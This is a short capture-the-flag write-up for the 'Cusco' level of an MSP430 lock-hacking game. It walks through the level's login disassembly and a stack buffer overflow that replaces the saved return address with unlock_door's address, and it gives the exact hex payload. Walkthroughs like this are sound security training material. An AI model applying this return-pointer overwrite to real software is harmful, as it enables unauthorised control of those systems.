# 4. Cusco

# Challenge Overview

OVERVIEW

    - We have fixed issues with passwords which may be too long.
    - This lock is attached the the LockIT Pro HSM-1.
---
    This is Software Revision 02. We have improved the security of the
    lock by  removing a conditional  flag that could  accidentally get
    set by passwords that were too long.

Running the program:

Enter the password to continue.
Remember: passwords are between 8 and 16 characters.
> password
That password is not correct.

# Solution

Looking at the assembly:

<login>
 3150 f0ff      add	#0xfff0, sp
 3f40 7c44      mov	#0x447c "Enter the password to continue.", r15
 b012 a645      call	#0x45a6 <puts>
450c:  3f40 9c44      mov	#0x449c "Remember: passwords are between 8 and 16 characters.", r15
 b012 a645      call	#0x45a6 <puts>
 3e40 3000      mov	#0x30, r14
 0f41           mov	sp, r15
451a:  b012 9645      call	#0x4596 <getsn>
451e:  0f41           mov	sp, r15
 b012 5244      call	#0x4452 <test_password_valid>
 0f93           tst	r15
 0524           jz	$+0xc <login+0x32>
 b012 4644      call	#0x4446 <unlock_door>
452c:  3f40 d144      mov	#0x44d1 "Access granted.", r15
 023c           jmp	$+0x6 <login+0x36>
 3f40 e144      mov	#0x44e1 "That password is not correct.", r15
 b012 a645      call	#0x45a6 <puts>
453a:  3150 1000      add	#0x10, sp
453e:  3041           ret

It seems the the saved return pointer will be directly after our buffer (shown at 0x453a). Checking for an overflow and setting it to theunlock_door function (0x4446) `0x41*0x10 + 0x4644

414141414141414141414141414141414644

The output is still the same but it unlocks the lock due to unlock_door being called.

Nice SRP overwrite.